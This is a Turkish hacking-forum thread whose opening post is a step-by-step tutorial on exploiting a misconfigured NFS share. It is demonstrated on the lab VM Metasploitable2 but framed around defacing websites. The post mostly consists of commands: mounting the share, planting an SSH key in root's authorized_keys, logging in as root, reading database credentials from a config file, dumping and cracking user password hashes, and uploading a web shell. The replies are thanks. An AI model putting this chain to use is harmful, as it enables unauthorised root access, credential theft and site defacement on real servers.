Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Genel Güvenlik

Genel Güvenlik Web, Gprs, Wap, Üzerinde Gizlenmek İçin Neler Yapmanız Gerekenler ...



NFS Protokolü ve Zafiyetini Sömürme

Genel Güvenlik

Yeni Konu aç Cevapla
 
Seçenekler
Alt 25-01-2018 15:52   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Gotham
Mesajlar
Konular

Teşekkür (Etti): 58
Teşekkür (Aldı): 44


NFS Protokolü ve Zafiyetini Sömürme



Selamun Aleyküm
NFS diye bir protokol var hepimizin bildiği üzere.Bu protokolü bilmiyorsanız şimdi öğreniceksiniz.
Öyleyse başlayalım

NFS kısaca “Yerel*bir*ağda,*birbirine*bağlı*Linux*sistemlerin ,*aralarında*
dosya*paylaşımını*sağlayan*bir*teknolojidir”
● Veri depolamada ucuzluk sağlar
● /etc/exports : Paylaşılan dosya bilgisi bu dosyadadır.
Sanırım bizi çok teknik detay bağlamıyor.Nasılsa bu kon nfs yapılandırması değil.Kısaca dosya paylaşım protokolü olduğunu gördük.


[COLOR="White"]
● nmap ile hedef sistemdeki servisleri listeledik :

● showmount -e hedefIP : Paylaşımları listeledik
● mkdir /tmp/nfs : /tmp dizinine nfs adında bir klasör oluşturduk.
● mount -t nfs <sunucu_adresi>:/<paylasim> <baglanacak_klasör>
istemci oluyoruz.Benim gireceğim komut ise böyle :
● mount -o nolock -t nfs 10.195.2.2:/ /tmp/nfs
● ssh-keygen
● cat .ssh/id_rsa.pub >> /tmp/nfs/root/.ssh/authorized_keys
● umount /tmp/nfs

● ssh root@10.195.2.2

● şimdi erişimimiz oldu işte.Ben bir defacer'sam ilk işim index atmak(!) olucaktır.
Şakasına diyorum zaten root olmuşuz tadını çıkaralım.Lakin bazı komutlar çalışmıyor.Sistem kaynaklı. "ls ,ln gibi" .Ben de python dan yararlanıcağım azıcık.Hava amak için yapıyor demeyin.
● Aslında sizde böyle hatalar vermiyecek.Size bu yoldan anlatmamın sebebi python etkileşimli kabuğun gücünü göstermek hem fena mı olur azıcık python bilginiz olsa.

● ls hataverdi.Yani o klasördeki dosyaları listeleyemiyorum.
● Ben de deface yapacağım web uygulamasının dizinine gidiyorum.(cd komutuyla)
● python yazıp etkileşimli kabuğa geçiş yapıyorum.
● os modülünü aktif ediyorum (import os)
● print os.listdir(".") ---> ile dosyaları listeliyorum
● config dizininde siteye ait gizli ve önemli dosyalar olduğunu tahmin ediyorum
● print os.listdir("config/.") --> ile config dizinindeki dosyaları listeliyorum.
● print open("config/config.inc.php").read() --> ile dosyayı okuyorum ve bana mysql(veritabanı) kullanıcı adı ve şifresini veriyor.
● mysql -u kullanıcı adı -p yazıp entera basarsanız şifre ister ve mysql bağlantısı kurmuş olursunuz.

● show databases; veritabanlarını listeler.
● use veritabanı ismi; ---> ismiverilen veritabanına geçiş yapar
use dvwa;
● show tables; --> tabloları listeliyorum
● select * from users; ---> bana kullanıcı adı şifreleri listeliyor.Son yaptığım veritabanı işine çoğunuz aşinasınızdır zaten sqlmap veya havij sayesinde.

● şifreler md5.kırmamız gerekicek.ben masaüstüme md5.txt ye kaydediyorum
admin:md5şifrenizburaya
● john aracıyla md5leri kırıyorum. md5 ne demek bilmeyenler araştırabilir.temel bir bilgidir.
● john --format=raw-MD5 /root/Desktop/md5.txt

● md5 ler kırıldı.admin panelinden giriş yapın.
● Benim yaptığım işlemlerin mantığını anlarsanız site wordpressmiş,joomlaymış,opencartmış bilmemneymiş vız gelir kolayca indirirsiniz evelAllah
.)
● upload kısmı arıyoruz veya shell atabilecek potansiyel bir zaafiyet.
Upload diye bir bölüm varmış girelim bakalım.Dosya upload etmeye yarıyormuş.Hemen kendi uploader.php dosyamı yüklüyorum.






●Gerisi sizde.Başta root oturumumuz vardı.Neden tekrar shell atmakla vs uğraştık derseniz.Anlatımımı zenginleştirmek için değişik yöntemlerin varlığını göstermek için o yollara başvurdum.

Kullanılan materyaller:
●Kali Linux
●m e t a s p l o i t a b l e 2
●beyin



___________________________________________

Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!

 Offline  
 
Alıntı ile Cevapla
Teşekkür

AquieLL, BloodOFCannon Teşekkür etti.
Alt 25-01-2018 15:58   #2
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
aquu.php
Mesajlar
Konular

Teşekkür (Etti): 817
Teşekkür (Aldı): 2275




Ellerine sağlık kardeşim devamını bekliyorum mutlaka.



___________________________________________


WWW.TÜRKHACKTEAM.ORG/TV
- AquieLL -
2014-2017
 Offline  
 
Alıntı ile Cevapla
Teşekkür

THE DARK ARMY Teşekkür etti.
Alt 25-01-2018 16:17   #3
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Gotham
Mesajlar
Konular

Teşekkür (Etti): 58
Teşekkür (Aldı): 44




saolasın. inşAllah vaktim oldukça devamı gelir



___________________________________________

Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!

 Offline  
 
Alıntı ile Cevapla
Alt 25-01-2018 21:40   #4
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Gotham
Mesajlar
Konular

Teşekkür (Etti): 58
Teşekkür (Aldı): 44




Alıntı:
AquieLL´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık kardeşim devamını bekliyorum mutlaka.
Birazcık yetki yükseltme ve forensics hakkında bilgi edindim.Onları paylaşmak istiyorum düşünceniz nedir ? (gerekli gereksiz gibisinden)

Word Press Sızma Testi İçin :
http://www.turkhackteam.org/web-serv...-part-1-a.html



___________________________________________

Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!


Konu 'Black Warrior tarafından (30-01-2018 18:57 Saat 18:57 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 27-01-2018 12:21   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
02/2015
Mesajlar
Konular

Teşekkür (Etti): 10
Teşekkür (Aldı): 354




eline saglık



___________________________________________

10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101

 Offline  
 
Alıntı ile Cevapla
Alt 27-01-2018 12:51   #6
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
12/2017
Mesajlar
Konular

Teşekkür (Etti): 8
Teşekkür (Aldı): 22




Eline Saglık
 Offline  
 
Alıntı ile Cevapla
Alt 27-01-2018 13:37   #7
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Gotham
Mesajlar
Konular

Teşekkür (Etti): 58
Teşekkür (Aldı): 44




Alıntı:
versen5656´isimli üyeden Alıntı Mesajı göster
eline saglık
Alıntı:
KaraMelek13´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık
Alıntı:
VATANMEVZUSU´isimli üyeden Alıntı Mesajı göster
Eline Saglık
Teşekkürler



___________________________________________

Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau